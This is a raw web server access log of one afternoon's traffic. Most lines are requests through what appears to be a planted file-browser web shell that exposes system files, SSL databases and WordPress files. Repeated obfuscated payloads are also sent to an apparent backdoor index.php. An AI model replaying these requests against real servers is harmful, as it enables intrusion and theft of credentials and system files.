51.79.186.0 - - [19/May/2026:15:45:09 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353530392p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313930392q3035656238323139343966646336323537633834653662633834393937386562222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:47:11 +0100] "GET /?fileloc=%2F%2Fetc%2Frc.local&path=%2F%2Fetc HTTP/2" 200 2856 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:14 +0100] "GET /?fileloc=%2F%2Fsbin%2Fnamed-nzd2nzf&path=%2F%2Fsbin HTTP/2" 200 5909 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:17 +0100] "GET /?fileloc=%2F%2Fsbin%2Fmksquashfs&path=%2F%2Fsbin HTTP/2" 200 84732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:20 +0100] "GET /?fileloc=%2F%2Fetc%2Fexim.conf.mailman2.dist&path=%2F%2Fetc HTTP/2" 200 10324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:15:47:19 +0100] "GET /view/item/171656572738 HTTP/1.1" 200 26715 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:47:23 +0100] "GET /?fileloc=%2F%2Fetc%2Fresolv.conf&path=%2F%2Fetc HTTP/2" 200 2639 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:26 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer%2FSMTP.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer HTTP/2" 200 15610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:29 +0100] "GET /?fileloc=%2F%2Fetc%2Fexim.pl.local&path=%2F%2Fetc HTTP/2" 200 116085 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:45:31 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353533312p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313933312q3539343131663139366666363639616664313137643439663365343738633834222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:47:32 +0100] "GET /?fileloc=%2F%2Fsbin%2Farptables-nft&path=%2F%2Fsbin HTTP/2" 200 88666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:35 +0100] "GET /?fileloc=%2F%2Fetc%2Fmailhelo&path=%2F%2Fetc HTTP/2" 200 2566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:38 +0100] "GET /?fileloc=%2F%2Fetc%2Fmke2fs.conf&path=%2F%2Fetc HTTP/2" 200 2956 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:41 +0100] "GET /?fileloc=%2F%2Fsbin%2Fselinuxexeccon&path=%2F%2Fsbin HTTP/2" 200 5972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:44 +0100] "GET /?fileloc=%2F%2Fsbin%2Fxfs_fsr&path=%2F%2Fsbin HTTP/2" 200 19712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:47 +0100] "GET /?fileloc=%2F%2Fsbin%2Farptables-nft-save&path=%2F%2Fsbin HTTP/2" 200 88671 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:50 +0100] "GET /?fileloc=%2F%2Fetc%2Fexim.crt&path=%2F%2Fetc HTTP/2" 200 2566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:53 +0100] "GET /?fileloc=%2F%2Fetc%2Fkrb5.conf&path=%2F%2Fetc HTTP/2" 200 2991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:45:53 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353535332p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313935332q6530613166323736346261323761313730346632323562343735623832616365222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:47:56 +0100] "GET /?fileloc=%2F%2Fsbin%2Fswapon&path=%2F%2Fsbin HTTP/2" 200 15610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:47:59 +0100] "GET /?fileloc=%2F%2Fetc%2Fasound.conf&path=%2F%2Fetc HTTP/2" 200 2610 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:03 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fwp-rocket%2Fcontributors.txt&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fwp-rocket HTTP/2" 200 2981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:05 +0100] "GET /?fileloc=%2F%2Fsbin%2Fmii-diag&path=%2F%2Fsbin HTTP/2" 200 11203 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:08 +0100] "GET /?fileloc=%2F%2Fetc%2FGREP_COLORS&path=%2F%2Fetc HTTP/2" 200 2639 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:11 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Foptimole-wp%2FCHANGELOG.md&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Foptimole-wp HTTP/2" 200 17038 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:14 +0100] "GET /?fileloc=%2F%2Fetc%2Fexim.conf.localopts&path=%2F%2Fetc HTTP/2" 200 3452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:46:15 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353537352p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313937352q6137343234363137653330646665383830613533623737643039383733643336222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:48:17 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Foptimole-wp%2Freadme.txt&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Foptimole-wp HTTP/2" 200 15060 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:20 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Ftablepress%2Freadme.txt&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Ftablepress HTTP/2" 200 7082 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:23 +0100] "GET /?fileloc=%2F%2Fetc%2Fdemodomains&path=%2F%2Fetc HTTP/2" 200 2566 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:26 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer%2FOAuth.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer HTTP/2" 200 3960 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:29 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpomo%2Fentry.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpomo HTTP/2" 200 3925 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:32 +0100] "GET /?fileloc=%2F%2Fetc%2Flocales.conf&path=%2F%2Fetc HTTP/2" 200 2705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:35 +0100] "GET /?fileloc=%2F%2Fetc%2Fbindresvport.blacklist&path=%2F%2Fetc HTTP/2" 200 2860 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:46:37 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353539372p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230313939372q3434383565313531623964313336613234373038643563613763303736663838222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:48:38 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fl10n%2Fclass-wp-translation-controller.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fl10n HTTP/2" 200 4986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:41 +0100] "GET /?path=%2Fhome%2Fplandeptncgov%2F.caldav%2Fplandeptncgov HTTP/2" 200 3041 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.71.160 - - [19/May/2026:15:48:42 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/032654668998 HTTP/1.1" 200 26976 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:48:44 +0100] "GET /?fileloc=%2F%2Fsbin%2Fxfs_growfs&path=%2F%2Fsbin HTTP/2" 200 16853 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:47 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fsitemaps%2Fclass-wp-sitemaps-registry.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fsitemaps HTTP/2" 200 3192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:50 +0100] "GET /?fileloc=%2F%2Fetc%2Fneighbor_netblocks&path=%2F%2Fetc HTTP/2" 200 2572 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:56 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Frevslider%2Fwelcome.html&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Frevslider HTTP/2" 200 3795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:48:58 +0100] "GET /?fileloc=%2F%2Fsbin%2Fip6tables-restore-translate&path=%2F%2Fsbin HTTP/2" 200 88676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:46:59 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353631392p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230323031392q3530366264316633373765356630633431346466356462623838303764306135222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:49:04 +0100] "GET /?fileloc=%2F%2Fetc%2Fwwwacct.conf&path=%2F%2Fetc HTTP/2" 200 2749 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:07 +0100] "GET /?fileloc=%2F%2Fetc%2Fgreylist_trusted_netblocks&path=%2F%2Fetc HTTP/2" 200 2579 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:09 +0100] "GET /?path=%2F%2Fhome%2Fhealthminncgov HTTP/2" 200 2631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:13 +0100] "GET /?fileloc=%2F%2Fetc%2Fantivirus.exim&path=%2F%2Fetc HTTP/2" 200 6511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:16 +0100] "GET /?fileloc=%2F%2Fetc%2Fnfsmount.conf&path=%2F%2Fetc HTTP/2" 200 3992 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:19 +0100] "GET /?fileloc=%2F%2Fsbin%2Fpure-quotacheck&path=%2F%2Fsbin HTTP/2" 200 7502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:22 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer%2FPOP3.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer HTTP/2" 200 6151 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:47:21 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353634312p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230323034312q3161313234393737626163333734336366323664373538656138316563353034222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
66.249.70.97 - - [19/May/2026:15:49:24 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-term-query.php?view/item/031297388830 HTTP/1.1" 200 26902 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.217.176 - - [19/May/2026:15:49:25 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpomo%2Fstreams.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpomo HTTP/2" 200 4420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:28 +0100] "GET /?fileloc=%2F%2Fsbin%2Firqbalance-ui&path=%2F%2Fsbin HTTP/2" 200 16143 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:33 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages%2Fadmin-ta_IN.po&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages HTTP/2" 200 22146 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:35 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fcontact-form-7%2F.htaccess&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fplugins%2Fcontact-form-7 HTTP/2" 200 2726 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:38 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fssl%2Fssl.db&path=%2Fhome%2Fplandeptncgov%2Fssl HTTP/2" 200 3476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:41 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages%2Fadmin-si_LK.po&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages HTTP/2" 200 66710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.186.0 - - [19/May/2026:15:47:43 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353636332p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230323036332q6431343436353465653662333938363738656230383864316236633334643866222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:49:44 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpomo%2F.htaccess&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpomo HTTP/2" 200 2712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:47 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages%2Fadmin-network-ta_IN.po&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages HTTP/2" 200 8269 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:50 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages%2Fta_IN.mo&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages HTTP/2" 200 62144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:53 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer%2F.htaccess&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer HTTP/2" 200 2716 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:56 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages%2Fadmin-network-si_LK.po&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages HTTP/2" 200 15633 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:49:59 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages%2Fsi_LK.mo&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages HTTP/2" 200 60734 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:50:02 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads-old%2F.htaccess&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads-old HTTP/2" 200 2712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:50:05 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpomo%2Fpo.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2Fpomo HTTP/2" 200 6791 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.70.110 - - [19/May/2026:15:50:05 +0100] "GET /collect/123640690091?fileloc=/home/plandeptncgov/public_html/wp-includes/class-wp-theme.php?view/item/071659159235 HTTP/1.1" 200 26552 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.7778.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.186.0 - - [19/May/2026:15:48:06 +0100] "GET /images/images/images/index.php?ARRAY=7o2230223n313737393230353638362p2231223n22687474703n5p2s5p2s7n733931367631332r6p6s73656973742r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313737393230323038362q3062306134393466313331306366636638376661616662386236656633313061222p2232223n223835373437343535663065386134616233316438316534643734653264333137222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232302q33342q36302q36352q37382q38362q3131227q HTTP/1.1" 500 384 "-" "-"
216.73.217.176 - - [19/May/2026:15:50:08 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages%2F.htaccess&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages HTTP/2" 200 2712 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:50:11 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages%2Fadmin-ta_IN.mo&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Flanguages HTTP/2" 200 19354 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:50:14 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer%2FPHPMailer.php&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-includes%2FPHPMailer HTTP/2" 200 44324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.176 - - [19/May/2026:15:50:17 +0100] "GET /?fileloc=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads%2F.htaccess&path=%2Fhome%2Fplandeptncgov%2Fpublic_html%2Fwp-content%2Fuploads HTTP/2" 200 2709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
